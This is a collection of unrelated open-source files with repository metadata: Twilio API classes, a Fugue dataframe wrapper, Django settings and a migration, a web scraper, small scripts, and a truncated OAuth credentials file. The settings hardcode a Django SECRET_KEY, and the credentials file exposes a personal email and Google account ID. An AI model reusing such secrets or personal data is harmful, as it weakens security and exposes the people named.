'service_sid': service_sid,
'channel_sid': channel_sid,
'sid': sid,
}
self._uri = '/Services/{service_sid}/Channels/{channel_sid}/Invites/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a InviteInstance
:returns: Fetched InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return InviteInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the InviteInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete('delete', self._uri)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.IpMessaging.V1.InviteContext {}>'.format(context)
class InviteInstance(InstanceResource):
""" """
def __init__(self, version, payload, service_sid, channel_sid, sid=None):
"""
Initialize the InviteInstance
:returns: twilio.rest.chat.v1.service.channel.invite.InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
super(InviteInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload['sid'],
'account_sid': payload['account_sid'],
'channel_sid': payload['channel_sid'],
'service_sid': payload['service_sid'],
'identity': payload['identity'],
'date_created': deserialize.iso8601_datetime(payload['date_created']),
'date_updated': deserialize.iso8601_datetime(payload['date_updated']),
'role_sid': payload['role_sid'],
'created_by': payload['created_by'],
'url': payload['url'],
}
# Context
self._context = None
self._solution = {
'service_sid': service_sid,
'channel_sid': channel_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: InviteContext for this InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
if self._context is None:
self._context = InviteContext(
self._version,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def channel_sid(self):
"""
:returns: The channel_sid
:rtype: unicode
"""
return self._properties['channel_sid']
@property
def service_sid(self):
"""
:returns: The service_sid
:rtype: unicode
"""
return self._properties['service_sid']
@property
def identity(self):
"""
:returns: The identity
:rtype: unicode
"""
return self._properties['identity']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def role_sid(self):
"""
:returns: The role_sid
:rtype: unicode
"""
return self._properties['role_sid']
@property
def created_by(self):
"""
:returns: The created_by
:rtype: unicode
"""
return self._properties['created_by']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch a InviteInstance
:returns: Fetched InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
return self._proxy.fetch()
def delete(self):
"""
Deletes the InviteInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.IpMessaging.V1.InviteInstance {}>'.format(context)
| [
"talk2shreyas@gmail.com"
] | talk2shreyas@gmail.com |
2039803a336ed484c58bade739c91627e889e3ca | 343ea722bc3e8d8f31c379235dc2b7e377314ccf | /busi_namegen.py | 00cbd91994b65b59d075a15ca987daecd8c1e325 | [
"MIT"
] | permissive | ksu-is/Business-Name-Gen | 9a1e25707e186a973f144878d26e1cc177edc910 | e19d54cbe4c9dc6425dc1fa394cd674bccfe62e0 | refs/heads/master | 2020-08-30T12:14:47.978161 | 2019-12-16T01:18:08 | 2019-12-16T01:18:08 | 218,377,376 | 0 | 0 | null | 2019-10-29T20:27:55 | 2019-10-29T20:27:55 | null | UTF-8 | Python | false | false | 1,802 | py | import requests
import random
word_site = "https://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain"
response = requests.get(word_site)
WORDS = response.content.splitlines()
the_name=''
the_business=''
the_word=''
suggestions=''
number=0
def Name():
global the_name
while True:
your_name=input("What is your name(enter either First or Last Name) :")
if your_name.isalpha():
the_name+=your_name
break
else:
print("Please try to use letters from the alphabet!")
Name()
def busi():
global the_business
while True:
your_business=input("What is your businesss centered around(Ex:Fishing,Clothes,Sports, etc):")
if your_business.isalpha():
the_business+=your_business
break
else:
print("Please try to use letters from the alphabet!")
busi()
def suggest():
global the_word
global suggestions
for word in WORDS:
gen=random.choice(WORDS).capitalize()
print(gen.decode('utf-8'))
happy_or=input("Do you like the word that describes your business? (yes or no or maybe)")
if happy_or=="yes":
the_word+=str(gen.decode('utf-8'))
break
elif happy_or=="maybe":
global number
suggestions+=str(gen.decode('utf-8'))+"\n"
number+=1
if number==5:
print(suggestions,"\n")
would_you=input("Which one of the suggestions do you like?")
if would_you in suggestions:
the_word+=would_you
break
else:
print("Type the word in the suggestions correctly!")
suggest()
print(the_name,"'s","new business name will be:",the_name,"'s",the_word,the_business)
| [
"noreply@github.com"
] | noreply@github.com |
245f6652f9ba5ff4ceaf3ca3474ff2ac846e80de | d0ea061adedf56bcac0863aa28c9ad3ea0c4e0e3 | /fugue/dataframe/dataframe_iterable_dataframe.py | f243fb7b0c488a82a05d319c6ed54d47d1f9a88d | [
"Apache-2.0"
] | permissive | datadevopscloud/fugue | 5962994c24e336587c5c13969cef50bf5253f7fb | 1eabdf81a4b6cd76195a2c366bb9d3688bcb6fb3 | refs/heads/master | 2023-04-12T12:41:54.796013 | 2021-05-17T04:07:25 | 2021-05-17T04:07:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,752 | py | from typing import Any, Dict, Iterable, List, Optional
import pandas as pd
import pyarrow as pa
from fugue.dataframe.array_dataframe import ArrayDataFrame
from fugue.dataframe.dataframe import DataFrame, LocalDataFrame, LocalUnboundedDataFrame
from fugue.exceptions import FugueDataFrameError, FugueDataFrameInitError
from triad import Schema, assert_or_throw
from triad.utils.iter import EmptyAwareIterable, make_empty_aware
class LocalDataFrameIterableDataFrame(LocalUnboundedDataFrame):
"""DataFrame that wraps an iterable of local dataframes
:param df: an iterable of
:class:`~fugue.dataframe.dataframe.DataFrame`. If any is not local,
they will be converted to :class:`~fugue.dataframe.dataframe.LocalDataFrame`
by :meth:`~fugue.dataframe.dataframe.DataFrame.as_local`
:param schema: |SchemaLikeObject|, if it is provided, it must match the schema
of the dataframes
:param metadata: dict-like object with string keys, default ``None``
:raises FugueDataFrameInitError: if the input is not compatible
:Examples:
.. code-block:: python
def get_dfs(seq):
yield IterableDataFrame([], "a:int,b:int")
yield IterableDataFrame([[1, 10]], "a:int,b:int")
yield ArrayDataFrame([], "a:int,b:str")
df = LocalDataFrameIterableDataFrame(get_dfs())
for subdf in df.native:
subdf.show()
:Notice:
It's ok to peek the dataframe, it will not affect the iteration, but it's
invalid to count.
``schema`` can be used when the iterable contains no dataframe. But if there
is any dataframe, ``schema`` must match the schema of the dataframes.
For the iterable of dataframes, if there is any empty dataframe, they will
be skipped and their schema will not matter. However, if all dataframes
in the interable are empty, then the last empty dataframe will be used to
set the schema.
"""
def __init__( # noqa: C901
self, df: Any = None, schema: Any = None, metadata: Any = None
):
try:
if isinstance(df, Iterable):
self._native = make_empty_aware(self._dfs_wrapper(df))
orig_schema: Optional[Schema] = None
if not self._native.empty:
orig_schema = self._native.peek().schema
else:
raise ValueError(
f"{df} is incompatible with LocalDataFrameIterableDataFrame"
)
if orig_schema is None and schema is None:
raise FugueDataFrameInitError(
"schema is not provided and the input is empty"
)
elif orig_schema is None and schema is not None:
pass
elif orig_schema is not None and schema is None:
schema = orig_schema
else:
schema = Schema(schema) if not isinstance(schema, Schema) else schema
assert_or_throw(
orig_schema == schema,
lambda: f"iterable schema {orig_schema} is different from {schema}",
)
super().__init__(schema, metadata)
except FugueDataFrameError:
raise
except Exception as e:
raise FugueDataFrameInitError from e
def _dfs_wrapper(self, dfs: Iterable[DataFrame]) -> Iterable[LocalDataFrame]:
last_empty: Any = None
last_schema: Any = None
yielded = False
for df in dfs:
if df.empty:
last_empty = df
else:
assert_or_throw(
last_schema is None or df.schema == last_schema,
lambda: FugueDataFrameInitError(
f"encountered schema {df.schema} doesn't match"
f" the original schema {df.schema}"
),
)
if last_schema is None:
last_schema = df.schema
yield df.as_local()
yielded = True
if not yielded and last_empty is not None:
yield last_empty
@property
def native(self) -> EmptyAwareIterable[LocalDataFrame]:
"""Iterable of dataframes"""
return self._native
@property
def empty(self) -> bool:
return self.native.empty or self.native.peek().empty
def peek_array(self) -> Any:
self.assert_not_empty()
return self.native.peek().peek_array()
def _select_cols(self, keys: List[Any]) -> DataFrame:
if self.empty:
return ArrayDataFrame([], self.schema)[keys]
def _transform():
for df in self.native:
yield df[keys]
return LocalDataFrameIterableDataFrame(_transform())
def rename(self, columns: Dict[str, str]) -> DataFrame:
if self.empty:
return ArrayDataFrame([], self.schema).rename(columns)
def _transform() -> Iterable[DataFrame]:
for df in self.native:
yield df.rename(columns)
return LocalDataFrameIterableDataFrame(_transform())
def alter_columns(self, columns: Any) -> DataFrame:
if self.empty:
return ArrayDataFrame([], self.schema).alter_columns(columns)
def _transform() -> Iterable[DataFrame]:
for df in self.native:
yield df.alter_columns(columns)
return LocalDataFrameIterableDataFrame(_transform())
def as_array(
self, columns: Optional[List[str]] = None, type_safe: bool = False
) -> List[Any]:
return sum(
(df.as_array(columns=columns, type_safe=type_safe) for df in self.native),
[],
)
def as_array_iterable(
self, columns: Optional[List[str]] = None, type_safe: bool = False
) -> Iterable[Any]:
for df in self.native:
yield from df.as_array_iterable(columns=columns, type_safe=type_safe)
def as_pandas(self) -> pd.DataFrame:
if self.empty:
return ArrayDataFrame([], self.schema).as_pandas()
return pd.concat(df.as_pandas() for df in self.native)
def as_arrow(self, type_safe: bool = False) -> pa.Table:
if self.empty:
return ArrayDataFrame([], self.schema).as_arrow()
return pa.concat_tables(df.as_arrow() for df in self.native)
def _drop_cols(self, cols: List[str]) -> DataFrame:
if self.empty:
return ArrayDataFrame([], self.schema)._drop_cols(cols)
def _transform() -> Iterable[DataFrame]:
for df in self.native:
yield df._drop_cols(cols)
return LocalDataFrameIterableDataFrame(_transform())
| [
"noreply@github.com"
] | noreply@github.com |
807c07dbe3578db5526f3e48ffc342fbfaf387a1 | af9ae1161026c2d58390737a5a149034668b16a8 | /01-webotron/webotron/webotron.py | 1bc1263ff53beb8f284741cc015d0748d0f9f537 | [] | no_license | jimbol60/auto-aws-w-python | 82bce75e5643bfb1af35b84d8783cfb88b7910c3 | 3b9c66588ad61a220455761497d1c7cdcc5eda7a | refs/heads/master | 2020-04-20T04:46:13.626125 | 2019-06-15T16:38:00 | 2019-06-15T16:38:00 | 168,637,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 1 10:46:38 2019
1
@author: Jim
"""
import boto3
import click
session = boto3.Session(profile_name='pythonAutomation')
s3 = session.resource('s3')
@click.group()
def cli():
"Webotron deploys websites to AWS"
pass
""" the @click is a decorator [this wraps a function] """
@cli.command('list-buckets')
def list_buckets():
"List all s3 buckets"
for bucket in s3.buckets.all():
print(bucket)
@cli.command('list-bucket-objects')
@click.argument('bucket')
def list_bucket_objects(bucket):
"List objects in an s3 bucket"
for obj in s3.Bucket(bucket).objects.all():
print(obj)
if __name__ == '__main__':
cli() | [
"jbolinder60@gmail.com"
] | jbolinder60@gmail.com |
e6c64fa2264290c17763d19942f3cc545b1e6ebe | 7089b86f90d855c7862d0b408e61a67725d0c254 | /website/migrations/0037_auto_20210129_1257.py | 9e69d14b79cb6b3aa11f06ebd0ac33962a22f43b | [] | no_license | samozzy/codamotion | 784fdeb99216f030a53f27a3c1f22041743b41f3 | 6a4a85852023d01b13459fa0cb644f1855eb752a | refs/heads/master | 2023-03-06T23:39:12.876150 | 2021-02-23T19:47:53 | 2021-02-23T19:47:53 | 334,784,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,129 | py | # Generated by Django 3.1.5 on 2021-01-29 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0036_auto_20210125_2315'),
]
operations = [
migrations.CreateModel(
name='SiteMenu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(choices=[('H', 'Header'), ('F', 'Footer')], default='H', max_length=1, unique=True)),
],
options={
'verbose_name': 'Menu',
'verbose_name_plural': 'Menus',
},
),
migrations.AlterField(
model_name='teammember',
name='person_type',
field=models.CharField(choices=[('KEYC', 'Key Contact'), ('MGMT', 'Management'), ('ADVS', 'Advisors')], default='KEYC', max_length=4),
),
migrations.AddField(
model_name='page',
name='menu',
field=models.ManyToManyField(to='website.SiteMenu'),
),
]
| [
"sam.tosborne@googlemail.com"
] | sam.tosborne@googlemail.com |
0c69214c33df80c1751a55ac48cf6d6cda486d5e | cd5814f1b364f290b44b1ad5e716318bedbd7782 | /test/Baike.py | 0def782d0674a877bd56e8ee640929b9e8d245d7 | [] | no_license | KingJA/KExcavator | a842abe28af516eec4b561b33d06e6214e4d36a7 | ab4273b8a149592936527a5d1b959aba85eb1f82 | refs/heads/master | 2021-01-22T07:57:35.151420 | 2017-05-27T09:29:23 | 2017-05-27T09:29:23 | 82,655,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | import re
from urllib.request import *
class Spider:
def __init__(self):
self.page = 1
# 记录访问的页码
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36r)'
# 伪装浏览器君
self.headers = {'User-Agent': self.user_agent}
self.stories = []
# 存储段子
def get_stories(self):
try:
url = 'http://www.qiushibaike.com/hot/page/' + str(self.page)
request = Request(url, headers=self.headers)
# 构建request
self.page += 1
# 翻页
response = urlopen(request)
print(response.read().decode("UTF-8"))
content = response.read().decode("UTF-8").replace("<br/>", "\n")
pattern = re.compile('alt="(.*?)".*?"content">\n(.*?)<!--(.*?)"number">(.*?)</i> 好笑', re.S)
# 作者, 可能存在的图片信息, 内容, 赞数
self.stories = re.findall(pattern, content)
# 正则表达式匹配
except URLError as e:
if hasattr(e, "reason"):
print("获取失败,错误原因", e.reason)
# 错误信息
return None
def start(self):
print("{:^70}".format('正在读取糗事百科'))
while True:
self.get_stories()
# 获取一页段子
for story in self.stories:
# 遍历段子
if not re.search('img', story[2]):
# 去除带图段子
Input = input("{:^70}".format('回车查看新段子, Q 键退出程序\n'))
# 用户键入
if Input is 'Q' or Input is 'q':
print("{:^70}".format('再见'))
return
print('{:^70}'.format('第{}页 作者:{} 赞数{}').format(self.page - 1, story[0], story[3]))
print('{}\n'.format(story[1]))
print("{:^70}".format('翻个页 TwT'))
spider = Spider()
spider.start()
| [
"kingjavip@gmail.com"
] | kingjavip@gmail.com |
8652501aa9d3ac641cd3ee899b3d58665f34fa0b | 051f3b084f1df675338815a12abde6a70ee5e649 | /locamapper.py | d1063feb7d8c84ecf7e11be5e316e0c669e62e8e | [] | no_license | CaMeLCa5e/daily | d952b1de9e5cb1bcb805203b0b1cde859adb2314 | e9ec40868e8085a521f009f9ccc19cd0c64c51c3 | refs/heads/master | 2020-04-26T11:25:10.130077 | 2015-04-19T19:30:45 | 2015-04-19T19:30:45 | 29,375,471 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | import sys
for line in sys.stdin
line = line.strip()
unpacked = line.split(",")
stadium, capacity, location, surface, turf, team, opened weather = line.split(",")
results = [turf, "1"]
print("\t".join(results))
| [
"JM273606@gmail.com"
] | JM273606@gmail.com |
3f4c50e048de35cf36b72fbd342a74a9bc8a9b08 | e4d12842108f5c9cf95408638cbea5ae56cd14e6 | /pkg9_include/icld3_base64.py | cfa8c2e86ba94ca3760374d11fb114fa385f34e9 | [] | no_license | TinloneX/Learning-Python | 22d6207ad6a20a908b91da7d2bc55eacbfa5e0b2 | b1b6d78915b567e3b69b1639495a44672a3b0ce2 | refs/heads/master | 2021-10-09T20:29:24.596230 | 2019-01-03T07:43:25 | 2019-01-03T07:43:25 | 108,959,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,069 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python 学习笔记 之 常用内建模块(3)
# base64
# 快速打印
from util import p
import base64
# --- b64encode / b64decode
b1 = base64.b64encode(b'binary\x00string')
p('字符转base64', b1)
d1 = base64.b64decode(b1)
p('base64转字符', d1)
# --- urlsafe_b64encode
b2 = base64.b64encode(b'i\xb7\x1d\xfb\xef\xff')
p('含+/的二进制数据b64', b2)
ub = base64.urlsafe_b64encode(b'i\xb7\x1d\xfb\xef\xff')
p('含+/的urlsafe转b64', ub)
ud = base64.urlsafe_b64decode(ub)
def b64_eq_decode(s): # 解析某种(去掉base64编码补位'='的)编码的算法
ls = len(s) # 获取长度待用,一般来说需要验证是否为0,此处未做
if not ls % 4 == 0: # 长度不能被4整除
for x in range(4 - ls % 4): # 计算需补位数
s = s + b'=' # 遍历补位,此处为 b'='
st = base64.b64decode(s) # 解码
p(st) # 输出验证
return st
# 验证有'='及去掉'='的解码结果
bo = b64_eq_decode(b'YWJjZA==') == b64_eq_decode(b'YWJjZA')
p(bo)
| [
"zhaojl@wenduing.com"
] | zhaojl@wenduing.com |
7955553baca04941d72f29dac6fb5ccbd9d159a9 | d55842114d818b39b5a05fbe5af39f941462799b | /test_storm/settings.py | 04c31594204700a609cadd96f671e3b6a40d3d1e | [] | no_license | Nataliel/test_storm | 85a67307d70230f7ac34adf64556df97e0990851 | 3663c956c03e54b794078b4c0a6bb2de42a62c35 | refs/heads/master | 2021-03-12T20:05:52.735039 | 2015-07-04T23:37:35 | 2015-07-04T23:37:35 | 38,549,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,088 | py | """
Django settings for test_storm project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from decouple import config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (os.path.join(MEDIA_ROOT, 'static'),)
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = ['*']
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3p(%ny#=g&ja6a=o021+a&j9gwh-gmv=b-pr@x=xj@d0h0!*(9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', cast=bool)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.request',
)
# Application definition
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'website',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'test_storm.urls'
WSGI_APPLICATION = 'test_storm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.%s' % config('DB_ENGINE'),
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD', default=''),
'HOST': config('DB_HOST', default='localhost'),
'PORT': config('DB_PORT', cast=bool),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
GRAPPELLI_ADMIN_TITLE = 'Storm Security'
CKEDITOR_UPLOAD_PATH = os.path.join(MEDIA_ROOT, 'uploads/ckeditor')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': [
# {'name': 'document', 'items': ['Source', '-', 'Save', 'NewPage','DocProps','Preview','Print','-','Templates' ] },
{'name': 'clipboard', 'items': ['Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', '-', 'Undo', 'Redo' ]},
{'name': 'editing', 'items': ['Find', 'Replace', '-', 'SelectAll', '-', 'SpellChecker', 'Scayt']},
{'name': 'links', 'items': ['Link', 'Unlink']},
{'name': 'insert', 'items': ['Image', 'Flash', 'Table', 'HorizontalRule', 'SpecialChar', 'PageBreak', 'Iframe']},
'/',
{'name': 'basicstyles', 'items': ['Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'RemoveFormat']},
{'name': 'paragraph', 'items': ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'CreateDiv',
'-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl']},
'/',
{'name': 'styles', 'items': ['Styles', 'Format', 'Font', 'FontSize']},
{'name': 'colors', 'items': ['TextColor', 'BGColor']},
{'name': 'tools', 'items': ['Maximize', 'ShowBlocks']}
],
'height': 0,
'width': 0,
},
}
| [
"nataliel.vasconcelos@gmail.com"
] | nataliel.vasconcelos@gmail.com |
08bfcedacd7477241c82042f91ec82ea9206394b | ddd60df07380bf9ac4f1e80c88728e5dc1822347 | /project3.py | 6f876c0eaad66b0b162675fc6541a5dc2a38bf8c | [] | no_license | smorram1/Database-project3 | b837fef5f283cde099415d01e32ca5efaa587deb | 5d8f05dca44969b1a8bcaed9c3e5dffeeff074c9 | refs/heads/master | 2022-05-27T00:05:32.589487 | 2020-05-01T22:41:34 | 2020-05-01T22:41:34 | 260,571,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,209 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 1 01:22:17 2020
@author: saipavankalyan,sai sandeep reddy
"""
from pymongo import MongoClient
def location(collection):
#The Location where more accidents are happening
accident=collection.aggregate([{'$group' : {'_id' : '$LocalAuthority',
'highest_accidents_city' : {'$sum' : 1}}},
{'$sort':{'highest_accidents_city':-1}},{'$limit':1}])
#Printing the data inserted
totalaccident=list(accident)
print("The Location were more accidents are happening : ",totalaccident[0]["_id"])
def severity(collection):
#Severity at Particular Location
serv = input("enter a city name:")
severe=collection.aggregate([{'$group':{'_id' : '$LocalAuthority',
'percent': {'$avg':{'$toDouble':'$Accident_Severity'}}}},
{'$match':{'_id':serv}}])
servloc=list(severe)
print('Severity at '+serv+" is",servloc[0]["percent"])
#sPEED LIMIT
def speedlimit(collection):
speed=collection.aggregate([{'$group' : {'_id' : '$Speed_limit', 'Frequency' : {'$sum' : 1}}},{'$sort':{'Frequency':-1}},{'$limit':1}])
speedlim=list(speed)
print("At this speed most accidents are happening :",speedlim[0]["_id"]+" mph")
def urbanrural(collection):
Urban=collection.aggregate([{'$group' : {'_id' : '$Urban_or_Rural_Area','Urban':{'$sum':1}}},{'$match':{'_id':'1'}}])
Rural=collection.aggregate([{'$group' : {'_id' : '$Urban_or_Rural_Area','Rural':{'$sum':1}}},{'$match':{'_id':'2'}}])
Total=collection.aggregate([{'$group' : {'_id' : 'null', 'Total' : {'$sum' : 1}}},{'$project': {'_id':0}}])
urbanlist=list(Urban)
rurallist=list(Rural)
total=list(Total)
urbanvalue=urbanlist[0]["Urban"]
ruralvalue=rurallist[0]["Rural"]
totalvalue=total[0]["Total"]
Final=((urbanvalue)/(totalvalue))*100
Final2=((ruralvalue)/(totalvalue))*100
print('Urban Percentage =',Final)
print('Rural Percentage =',Final2)
def conditions(collection):
Light=collection.aggregate([{'$group':{'_id' :{ 'light':'$Light_Conditions','weather':'$Weather_Conditions','Road_Surface':'$Road_Surface_Conditions'},
'Light':{'$sum' :1}}},{'$sort':{'Light':-1}},{'$limit':1}])
bettercond=list(Light)
print("The following are the factors contribute to most of accidents :")
print(bettercond[0]["_id"]['light'])
print(bettercond[0]["_id"]['weather'])
print(bettercond[0]["_id"]['Road_Surface'])
def day(Week):
days={
"1" : "Sunday","2" : "Monday","3" : "Tuesday","4" : "Wednesday","5" : "Thrusday","6" : "Friday","7" : "Saturaday",
}
print ("The day of the week which is safest to travel :" ,days.get(Week))
def safeday(collection):
Weekday=collection.aggregate([{'$group' : {'_id' : '$Day_of_Week', 'Weekday' : {'$sum' : 1}}},{'$sort':{'Weekday':1}},{'$match':{'_id':{'$nin':[None]}}},{'$limit':1}])
week=list(Weekday)
day(week[0]["_id"])
def ped_cautious(collection):
Pedestrains=collection.aggregate([{'$group':{'_id' :{ 'pedestrains':'$Pedestrian_Crossing-Physical_Facilities','junction':'$Junction_Control'},
'Pedestrains':{'$sum' :1}}},
{'$match':{'_id.pedestrains':{'$nin':[None,'No physical crossing within 50 meters']}}},
{'$sort':{'Pedestrains':-1}},{'$limit':1}])
ped=list(Pedestrains)
print("At this signals pedestrains must be cautious:", ped[0]["_id"]["junction"])
def monthchar(no_of_month):
months={
"01" : "January","02" : "February","03" : "March","04" : "April","05" : "May","06" : "June","07" : "July","08" : "August","09" : "September","10" : "October","11" : "November","12" : "December"
}
return months[no_of_month]
def casualites(collection):
monthstr=collection.aggregate([{'$project':{'month123':{'$substr':['$Date',3,2]}}},
{'$group':{'_id':'$month123','sum':{'$sum':1}}},
{'$sort':{'_id':1}},
{'$match':{'_id':{'$nin':['']}}}])
high_month=list(monthstr)
for month in high_month:
print(monthchar(month["_id"])+":",month["sum"])
if __name__=="__main__":
try:
conn = MongoClient()
print("Connected successfully!!!")
except:
print("Could not connect to MongoDB")
# database
db = conn.database
collection = db.project3
flag =1
while flag:
print()
print("**********Welcome to Menu***************")
print("1. Average Severity at Particular location")
print("2. No. of Casualties per month")
print("3. The Location where more accidents are happening ")
print("4. which day of the week is safe to travel")
print("5. Percentage of Urban and Rural")
print("6. At which speed limit most accidents happened")
print("7. What factors contribute to most of accidents")
print("8. At which Traffic signals pedestrian must be cautious regarding traffic")
print("9. exit")
option=input("Select your Option: ")
if option=="1":
severity(collection)
elif option =="2":
casualites(collection)
elif option=="3":
location(collection)
elif option=="4":
safeday(collection)
elif option=="5":
urbanrural(collection)
elif option=="6":
speedlimit(collection)
elif option=="7":
conditions(collection)
elif option=="8":
ped_cautious(collection)
elif option=="9":
break
else:
print("enter a valid input")
| [
"noreply@github.com"
] | noreply@github.com |
b2006cbb7580f686445bb729d89f9d2782cd9c57 | 3f5504aff203cc15ca8754353991208962a04a90 | /src/the_tale/the_tale/game/heroes/shop_accessors.py | ee3911ac374e614437dcd8b8046989ebb6aca997 | [
"BSD-3-Clause"
] | permissive | Portal777/the-tale | 39614e60fa817a1e00e948a2b465fcb6be35e0c6 | 1a98294f6ed45d26bf5f09bdd2b4a931dbbb72e3 | refs/heads/master | 2021-08-24T01:46:11.472205 | 2017-11-04T13:31:30 | 2017-11-04T13:31:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # coding: utf-8
import random
from the_tale.game.balance.power import Power
from the_tale.game.artifacts.storage import artifacts_storage
from the_tale.game.cards import objects as cards_objects
class ShopAccessorsMixin(object):
__slots__ = ()
def purchase_energy_bonus(self, energy):
self.add_energy_bonus(energy)
def purchase_experience(self, experience):
self.add_experience(experience)
def purchase_artifact(self, rarity, better):
distribution = self.preferences.archetype.power_distribution
power = Power.better_artifact_power_randomized(distribution, self.level) if better else Power.artifact_power_randomized(distribution, self.level)
artifacts_storage.sync()
artifact = random.choice(artifacts_storage.artifacts).create_artifact(level=self.level,
power=power,
rarity=rarity)
self.put_loot(artifact, force=True)
self.actions.request_replane()
return artifact
| [
"a.eletsky@gmail.com"
] | a.eletsky@gmail.com |
61ce39cee06a71424604156a993f7a1719461fab | 7f980ec40d1b519657dd04031dc284b5f2e2f5b7 | /templates/credentials_json.py | 213a9080af6dddcc3417f933afc085e4470c85e8 | [] | no_license | kiote/calendar_app_old | 40ca8e2c95dee6cc30137cb2af2ded14fa3ab3ff | a4eee4652c4a6251e955a34d5f6d74d9309de55b | refs/heads/master | 2021-01-18T01:26:39.591257 | 2015-09-03T13:44:46 | 2015-09-03T13:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,998 | py | credentials_json = '{"id_token": {"email_verified": "true", "iat": 1440140555, "sub": "106463563386518781717", "exp": 1440144155, "at_hash": "DsD0wf9PcW5tKHeEN3MCTA", "aud": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com", "email": "krivich.ekaterina@gmail.com", "azp": "647104960407-ri4op15lnr2mh964rlequ3ffslinu9ps.apps.googleusercontent.com", "iss": "accounts.google.com"}, "_module": "oauth2client.client", "token_response": {"id_token": 